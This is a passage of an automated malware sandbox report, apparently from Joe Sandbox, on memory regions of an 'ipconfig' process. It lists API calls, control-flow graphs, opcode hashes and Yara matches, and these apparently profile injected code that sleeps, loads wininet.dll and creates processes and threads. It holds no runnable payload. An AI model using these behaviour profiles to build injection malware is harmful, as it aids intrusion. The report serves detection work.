                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 2f05786258e34a80515f401014dac136dfee3374f0a09eeb74d5e3de5a5b780a
                                                                                                                              • Instruction ID: b938691fa7b4fff08a9d7560eb29a267a6abcee8e4fcd0403a6119c4c96a3bc5
                                                                                                                              • Opcode Fuzzy Hash: 2f05786258e34a80515f401014dac136dfee3374f0a09eeb74d5e3de5a5b780a
                                                                                                                              • Instruction Fuzzy Hash: 6A90022921344546D180B198580864A001987D1202FA5E455A101A568CCA15896D5722
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 654eacc8fda6bebbe970984d9140a98c1e64c2e116ebbcb9702023216eadaf99
                                                                                                                              • Instruction ID: 64a988121ad00838b77991205d1cfc0303e549dfa2c0da0cbefcf3be32f52dd4
                                                                                                                              • Opcode Fuzzy Hash: 654eacc8fda6bebbe970984d9140a98c1e64c2e116ebbcb9702023216eadaf99
                                                                                                                              • Instruction Fuzzy Hash: 6990023120144946D100B5D85808686001987E0301F65E051A6029565EC76589996532
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: e197dfd517d804f86319a03d3aca5ca178801ff7809b0ee7f633fc579d7368fb
                                                                                                                              • Instruction ID: daa3bc50557a4935c16ae3b7db0c8024843a7ce493cf8acde18ca728c072a4ef
                                                                                                                              • Opcode Fuzzy Hash: e197dfd517d804f86319a03d3aca5ca178801ff7809b0ee7f633fc579d7368fb
                                                                                                                              • Instruction Fuzzy Hash: 0990023120144D86D100B1984804B86001987E0301F65D056A1129664D8715C9597922
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8aeedc3f0758482121168734aea7559e56198e2d7bfe62bded71ba1bb7f8af0c
                                                                                                                              • Instruction ID: 413d789606420cf37c5bc76448e956df7934c751ca482f755ccc56889aee7f54
                                                                                                                              • Opcode Fuzzy Hash: 8aeedc3f0758482121168734aea7559e56198e2d7bfe62bded71ba1bb7f8af0c
                                                                                                                              • Instruction Fuzzy Hash: FD9002312014CD46D110B198880478A001987D0301F69D451A5429668D879589997522
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: c1a5342aa95e46ad2595bc76e5c65dd6f9fc4d9d82e4f9d54b4f8ab7d9fb5489
                                                                                                                              • Instruction ID: 0d21f5fe07b335be7a4702cf4bc279f9089ae93842372c1e0fd2144f8db7a71a
                                                                                                                              • Opcode Fuzzy Hash: c1a5342aa95e46ad2595bc76e5c65dd6f9fc4d9d82e4f9d54b4f8ab7d9fb5489
                                                                                                                              • Instruction Fuzzy Hash: 1290023160554946D100B1984914746101987D0201F75D451A1429578D87958A5969A3

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 495 e49040-e49082 call e4bd00 498 e4915c-e49162 495->498 499 e49088-e490d8 call e4bdd0 call e3ace0 call e44e40 495->499 506 e490e0-e490f1 Sleep 499->506 507 e49156-e4915a 506->507 508 e490f3-e490f9 506->508 507->498 507->506 509 e49123-e49144 call e48e70 508->509 510 e490fb-e49121 call e48c60 508->510 514 e49149-e4914c 509->514 510->514 514->507
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00E490E8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: 004887c11589396434634dbd5c9981ec386fb4843a024e1a7de2aff6759da3c3
                                                                                                                              • Instruction ID: 334777ec684b3a168586e61324946ee3a1f45e8b5b96feb138612641c23f322e
                                                                                                                              • Opcode Fuzzy Hash: 004887c11589396434634dbd5c9981ec386fb4843a024e1a7de2aff6759da3c3
                                                                                                                              • Instruction Fuzzy Hash: E131A1B2900745BBC724DF64D885FA7B7F8BB88B05F10801DF62A7B245DB30A550CBA4

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 515 e49036-e4906f 516 e4907b-e49082 515->516 517 e49076 call e4bd00 515->517 518 e4915c-e49162 516->518 519 e49088-e490d8 call e4bdd0 call e3ace0 call e44e40 516->519 517->516 526 e490e0-e490f1 Sleep 519->526 527 e49156-e4915a 526->527 528 e490f3-e490f9 526->528 527->518 527->526 529 e49123-e49144 call e48e70 528->529 530 e490fb-e49121 call e48c60 528->530 534 e49149-e4914c 529->534 530->534 534->527
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00E490E8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: 4fcbb8edc6530f4dd33185664076486c410a58787b11843f7b247848b294b9f9
                                                                                                                              • Instruction ID: a6b359af2c744461d2506c1d2c22b40cc965d33308e1a695a1fe867035b066ed
                                                                                                                              • Opcode Fuzzy Hash: 4fcbb8edc6530f4dd33185664076486c410a58787b11843f7b247848b294b9f9
                                                                                                                              • Instruction Fuzzy Hash: 8C21D0B1A01345ABCB24DF64D8C5B67BBF4BB88B04F10805DE6297B246C774A550CBA5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 647 e4a5f0-e4a621 call e4af20 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(&E,?,00E44C9F,00E44C9F,?,00E44526,?,?,?,?,?,00000000,00000000,?), ref: 00E4A61D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: &E
                                                                                                                              • API String ID: 1279760036-1348104045
                                                                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                              • Instruction ID: 6395f787ecff017d54c8e01cdde5e106ef386e943fef6d7eec8eac8aa228020d
                                                                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                              • Instruction Fuzzy Hash: 56E046B2200208ABDB14EF99DC41EA777ADEF88764F158558FE186B242C631F914CBF0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 650 e4a630-e4a661 call e4af20 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E33AF8), ref: 00E4A65D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: .z`
                                                                                                                              • API String ID: 3298025750-1441809116
                                                                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                              • Instruction ID: a67ff051bdf7e19477de85be383d13a002a9506c7dfed3ccdbc707526043d170
                                                                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                              • Instruction Fuzzy Hash: F7E04FB22002046BD714DF59DC45EA777ADEF88750F014554FD1857241C631F914CAF0
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E3836A
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E3838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 6fae3b0b1f1110f3ba984b54532f5f400ce58af10d3fcb7b37f8146a07d2ba7a
                                                                                                                              • Instruction ID: 27eb643a0738178ed2a4081575cd7e23e0539e6301c2c9675df14781911768d1
                                                                                                                              • Opcode Fuzzy Hash: 6fae3b0b1f1110f3ba984b54532f5f400ce58af10d3fcb7b37f8146a07d2ba7a
                                                                                                                              • Instruction Fuzzy Hash: 99114E729403287BDB11A664AC07FFE77986F40B55F091154FB04BB2C1DBA9AD0587F1
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E3836A
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E3838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 7a7db78e318659ce995d00dee244df93e8f2fb8316e03c2a224c66c113239db3
                                                                                                                              • Instruction ID: 05ac87cdc5f694d1306e2e80d05e1b5e477b84c06beda479b3bcf6e0bde435e2
                                                                                                                              • Opcode Fuzzy Hash: 7a7db78e318659ce995d00dee244df93e8f2fb8316e03c2a224c66c113239db3
                                                                                                                              • Instruction Fuzzy Hash: 6C014C31B412187BE720A6909C07FFE7B6C5B40F40F080118FF04BA1C2D694690583E2
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E3836A
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E3838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E3AD52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E4A6F4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3F040,?,?,00000000), ref: 00E491AC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3F040,?,?,00000000), ref: 00E491AC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3F1C2,00E3F1C2,?,00000000,?,?), ref: 00E4A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,00E38D14,?), ref: 00E3F6EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3F1C2,00E3F1C2,?,00000000,?,?), ref: 00E4A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,00E38D14,?), ref: 00E3F6EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              APIs
                                                                                                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(000008FF,00000000,00000000,?,00000014,00000000), ref: 00F63BEE
                                                                                                                              • ConvertLengthToIpv4Mask.IPHLPAPI(?,00000000), ref: 00F63C4F
                                                                                                                              • InetNtopW.WS2_32(00000002,?,?,00000041), ref: 00F63C79
                                                                                                                                • Part of subcall function 00F63096: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00F630B1
                                                                                                                                • Part of subcall function 00F63096: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00F630BF
                                                                                                                                • Part of subcall function 00F63096: GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00F630D9
                                                                                                                                • Part of subcall function 00F63096: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00F630E5
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00F63F4C
                                                                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F63F53
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F63FCE
                                                                                                                              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F63FD5
                                                                                                                                • Part of subcall function 00F63901: RtlIpv4AddressToStringExW.NTDLL ref: 00F63918
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00F64141
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,?,?,?,?), ref: 00F64151
                                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,000000C6,00000000,00000000,?), ref: 00F64167
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00F64190
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Local$FreeHeapTime$FileFormat$AllocIpv4MessageProcess$AdaptersAddressAddressesConvertDateErrorInetLastLengthMaskNtopStringSystem__iob_func
                                                                                                                              • String ID: %02X-$A
                                                                                                                              • API String ID: 2780012581-292374352
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00F652D6,00F61000), ref: 00F651A7
                                                                                                                              • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00F652D6,?,00F652D6,00F61000), ref: 00F651B0
                                                                                                                              • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00F652D6,00F61000), ref: 00F651BB
                                                                                                                              • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00F652D6,00F61000), ref: 00F651C2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3231755760-0
                                                                                                                              • Opcode ID: 70ff086beb516c3ef91374f1bbbc3e779d65c886ae04fa24a1ba33c0580420b6
                                                                                                                              • Instruction ID: fa72080022de79fbf6e0744cf8e749df0686c6b49620499694a64260b8974f9a
                                                                                                                              • Opcode Fuzzy Hash: 70ff086beb516c3ef91374f1bbbc3e779d65c886ae04fa24a1ba33c0580420b6
                                                                                                                              • Instruction Fuzzy Hash: C6D0C93200830CBBDB003BE1EC0CA493F28EB4821AF048000F32A82060CBB14401AB71
                                                                                                                              APIs
                                                                                                                              • DnsGetCacheDataTableEx.DNSAPI(00000001,00000000,?), ref: 00F63885
                                                                                                                              • DnsFree.DNSAPI(?,00000000), ref: 00F638E8
                                                                                                                              • DnsFree.DNSAPI(?,00000000), ref: 00F638F0
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$CacheDataFormatLocalMessageTable__iob_func
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186664420-0
                                                                                                                              • Opcode ID: 54d2fbd9801ba53d25c940dd21e46402843dad0d1d54bfadfeb7af994ce3a451
                                                                                                                              • Instruction ID: b6f368024b99c9227668beb2bac9b2790dcc59b2f8551e67c8ade63ca14ac0e0
                                                                                                                              • Opcode Fuzzy Hash: 54d2fbd9801ba53d25c940dd21e46402843dad0d1d54bfadfeb7af994ce3a451
                                                                                                                              • Instruction Fuzzy Hash: F401C872A08314ABD720AB61CD86EB773A9EF90FA0714442DF49657141DB75BE00B360
                                                                                                                              APIs
                                                                                                                              • AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F64AFB
                                                                                                                              • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 00F64B10
                                                                                                                              • FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 00F64B23
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3429775523-0
                                                                                                                              • Opcode ID: 019aa126fb7598f86b6ef90632f4b90492cdcbdbdcbf4edc561b9a6da334a6f3
                                                                                                                              • Instruction ID: 260661ce66a1ca178dc2d0910e6b46f9618adc4d5ecc6482b0591c3756a13635
                                                                                                                              • Opcode Fuzzy Hash: 019aa126fb7598f86b6ef90632f4b90492cdcbdbdcbf4edc561b9a6da334a6f3
